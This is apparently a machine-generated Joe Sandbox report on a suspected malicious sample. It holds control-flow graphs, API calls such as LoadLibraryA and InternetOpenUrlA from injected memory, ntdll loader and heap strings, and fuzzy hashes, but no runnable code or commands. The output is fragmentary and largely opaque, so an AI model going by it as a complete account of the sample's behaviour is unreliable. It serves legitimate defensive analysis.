                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID: ;!#'
                                                                                                                                                                                                                                • API String ID: 1029625771-608325217
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                control_flow_graph 542 166e098-166e09e call 166e40c 545 166e0a0-166e114 542->545 547 166e11a-166e147 545->547 548 166d5d9-166d686 545->548 549 166e149-166e1d9 call 166e31e 547->549 551 166d73f-166d74f LoadLibraryA call 166d753 548->551 552 166d68c-166d73d call 166d6ae call 166de34 call 166d753 548->552 561 166e1e7-166e249 549->561 562 166e1db-166e1e5 549->562 552->551 561->549 566 166e24f-166e25c 561->566 562->561 566->545 568 166e262-166e28e 566->568 568->545 570 166e294-166e300 568->570 570->545 573 166e306-166e310 570->573 573->548 574 166e316-166e317 573->574
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(B2B1C27B,E6BEB875), ref: 0166D73F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID: `
                                                                                                                                                                                                                                • API String ID: 1029625771-1850852036
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                control_flow_graph 593 166d39d-166d3f5 595 166d3f7-166d40c 593->595 596 166d42f-166d492 593->596 595->596 597 166d40e-166d42b 595->597 599 166d498-166d4c1 call 166d553 596->599 600 166d5d9-166d686 596->600 599->600 603 166d73f-166d74f LoadLibraryA call 166d753 600->603 604 166d68c-166d73d call 166d6ae call 166de34 call 166d753 600->604 604->603
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                control_flow_graph 616 166a8b0-166aacf call 166aa8a CreateFileA
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,-09075E35,-C761E599,-BC93AC97), ref: 0166AAC9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                control_flow_graph 623 166db0e-166db2e 625 166db34-166db41 623->625 626 166d5d9-166d686 623->626 628 166d73f-166d74f LoadLibraryA call 166d753 626->628 629 166d68c-166d73d call 166d6ae call 166de34 call 166d753 626->629 629->628
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(B2B1C27B,E6BEB875), ref: 0166D73F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(B2B1C27B,E6BEB875), ref: 0166D73F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 655 166b972-166bf77 call 166b977 call 166db52 LdrInitializeThunk
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01662590), ref: 0166BF75
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 661 1670b10-1670c25 666 1670c27-1670c2e 661->666 666->666 667 1670c30-1670cf4 call 1670da8 InternetOpenUrlA 666->667 673 1670d36-1670d42 667->673 674 1670d48-1670d4f 673->674 674->674 675 1670d51-1670d91 674->675
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • InternetOpenUrlA.WININET(?,-5B147469,A3E57FEF), ref: 01670CF2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InternetOpen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2038078732-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 677 16612a6-16612cd EnumWindows
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnumWindows
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1129996299-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 678 1f202b2a-1f202b2f 679 1f202b31-1f202b38 678->679 680 1f202b3f-1f202b46 LdrInitializeThunk 678->680
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                                • API String ID: 3446177414-1700792311
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: HEAP:
                                                                                                                                                                                                                                • API String ID: 3446177414-2466845122
                                                                                                                                                                                                                                • Opcode ID: abd4c2696f8dbcd92dc66ea0dff70085d7bccc2d895b291018dacf1e9cd9e093
                                                                                                                                                                                                                                • Instruction ID: cb5fd2aaa9ae29dec28478de39049fdf8498cf5f321043c685b9cca009a9ec85
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: abd4c2696f8dbcd92dc66ea0dff70085d7bccc2d895b291018dacf1e9cd9e093
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84A15771A147228FDB04CE28C894A1AB7E9FF88310F15466DE946DB360E775EC45CF91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1F234507
                                                                                                                                                                                                                                • ExecuteOptions, xrefs: 1F2344AB
                                                                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1F234460
                                                                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1F234530
                                                                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1F23454D
                                                                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 1F234592
                                                                                                                                                                                                                                • Execute=1, xrefs: 1F23451E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                                                                • Opcode ID: 008163fe7fc7913fe53a259af499c087f3f01a9921ec90a63327e696b06b1a64
                                                                                                                                                                                                                                • Instruction ID: cbe2d4c00b9b662889666a850003ca455cc41cc77f7a5e9cfd10ad1ce5152ef2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 008163fe7fc7913fe53a259af499c087f3f01a9921ec90a63327e696b06b1a64
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22510775A00359AAEF10DBA4DC95FE973A8EF08310F1005E9E905E7190E770BE69CF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F227807
                                                                                                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F2277E2
                                                                                                                                                                                                                                • SsHd, xrefs: 1F1DA304
                                                                                                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 1F2277DD, 1F227802
                                                                                                                                                                                                                                • Actx , xrefs: 1F227819, 1F227880
                                                                                                                                                                                                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1F2278F3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                                                                                • API String ID: 0-1988757188
                                                                                                                                                                                                                                • Opcode ID: 67a7cddf30b6333abd11e4de334f2fdc0312d20415b1cee80569d9c70cc82734
                                                                                                                                                                                                                                • Instruction ID: f58ff8f7a6c487899cd4c7c1531ab5427ce78318a57054829146166cf124d89f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67a7cddf30b6333abd11e4de334f2fdc0312d20415b1cee80569d9c70cc82734
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4E1F272A083428FD715CE28C99875A7BF1BF85314F150B2DF8A5CB292E735E855CB82
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • GsHd, xrefs: 1F1DD794
                                                                                                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F229178
                                                                                                                                                                                                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1F229372
                                                                                                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F229153
                                                                                                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 1F22914E, 1F229173
                                                                                                                                                                                                                                • Actx , xrefs: 1F229315
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                                                                                • API String ID: 3446177414-2196497285
                                                                                                                                                                                                                                • Opcode ID: 80168923a09df8b4ccb7439edbd0895a0e4ac1412b33a6c13f37bd0ec7afc1bc
                                                                                                                                                                                                                                • Instruction ID: 2981c7e9845c59e47a3ec41991f59016d3bb205ac12d8ab73ac6a915ccbececd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80168923a09df8b4ccb7439edbd0895a0e4ac1412b33a6c13f37bd0ec7afc1bc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6E1DC70A083428FD711CF25C994B9AB7F5BF88358F904A2DF8968B381D771E854CB92
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 1F1B651C
                                                                                                                                                                                                                                  • Part of subcall function 1F1B6565: RtlDebugPrintTimes.NTDLL ref: 1F1B6614
                                                                                                                                                                                                                                  • Part of subcall function 1F1B6565: RtlDebugPrintTimes.NTDLL ref: 1F1B665F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1F2197B9
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F2197A0, 1F2197C9
                                                                                                                                                                                                                                • apphelp.dll, xrefs: 1F1B6446
                                                                                                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1F219790
                                                                                                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1F21977C
                                                                                                                                                                                                                                • LdrpInitShimEngine, xrefs: 1F219783, 1F219796, 1F2197BF
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-204845295
                                                                                                                                                                                                                                • Opcode ID: dc9a4a2075da975d9b1d56c6da3c3599933d758127b9c19437af2710a71371d3
                                                                                                                                                                                                                                • Instruction ID: 979bf47c6ac9518f13d570e5c5df27d602abe8d41bf46fcb99b4e2a76d21e28b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc9a4a2075da975d9b1d56c6da3c3599933d758127b9c19437af2710a71371d3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E351BDB56083559FE320CF20C894F9B77E8EF84794F40091DF9869B660EA31A924CB93
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                                                                                • API String ID: 3446177414-4227709934
                                                                                                                                                                                                                                • Opcode ID: 99fb755fb62c5d2cd5540db43ffb58fcf9aef4d56d0fe801e624938625445f8e
                                                                                                                                                                                                                                • Instruction ID: 03b59fa1e6fd84fb95a0a6df5dcaf230df91fc37cfb52446c4ae33d7568e6ef8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99fb755fb62c5d2cd5540db43ffb58fcf9aef4d56d0fe801e624938625445f8e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3414CF5E0021AABCB05CF95D894ADEBBB5FF48355F200119ED85AB340D771AD12DB90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                                                                                                • API String ID: 3446177414-3492000579
                                                                                                                                                                                                                                • Opcode ID: 9c8b040795059252fe2f9f4f290f7bea66b8025d1c6ac8495d13405259029316
                                                                                                                                                                                                                                • Instruction ID: a75f2bfd70c9869e7e93b0b71cff66770362bf57d4fb65678d1282f839fcc431
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c8b040795059252fe2f9f4f290f7bea66b8025d1c6ac8495d13405259029316
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2710135910686DFCB01CF68C4A0AEDFBF2FF49320F54815DE8859B651EB35A992CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F219854, 1F219895
                                                                                                                                                                                                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1F219885
                                                                                                                                                                                                                                • LdrpLoadShimEngine, xrefs: 1F21984A, 1F21988B
                                                                                                                                                                                                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1F219843
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-3589223738
                                                                                                                                                                                                                                • Opcode ID: 40608847413ced9ddc1fbdad327ed4c85192cd050563c46f6bd1cff1a8475ce6
                                                                                                                                                                                                                                • Instruction ID: 931b20b6ae2276434641a93113cce368ad17526a3197301d1e96d642a52c5cbb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40608847413ced9ddc1fbdad327ed4c85192cd050563c46f6bd1cff1a8475ce6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F15134B6B103A4DFDB04DBA8CC98EDD77B6AB54314F050169E802AF695DB75BC60CB80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 1F1ED879
                                                                                                                                                                                                                                  • Part of subcall function 1F1C4779: RtlDebugPrintTimes.NTDLL ref: 1F1C4817
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-1975516107
                                                                                                                                                                                                                                • Opcode ID: 3124d99aa881a27bdc6406301ff757e734fcf7e1bb8d7b80af310a4ff2f554a9
                                                                                                                                                                                                                                • Instruction ID: b779dd6e6383a264e5cb19cd0851cd2d457f9156df0c357d23c751f3dbdfe284
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3124d99aa881a27bdc6406301ff757e734fcf7e1bb8d7b80af310a4ff2f554a9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88513475E047469FDB05CFA8C5A8B8EBBF1BF44318FA04159D8016B682D772B9B5CB80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                                                                • API String ID: 3446177414-3224558752
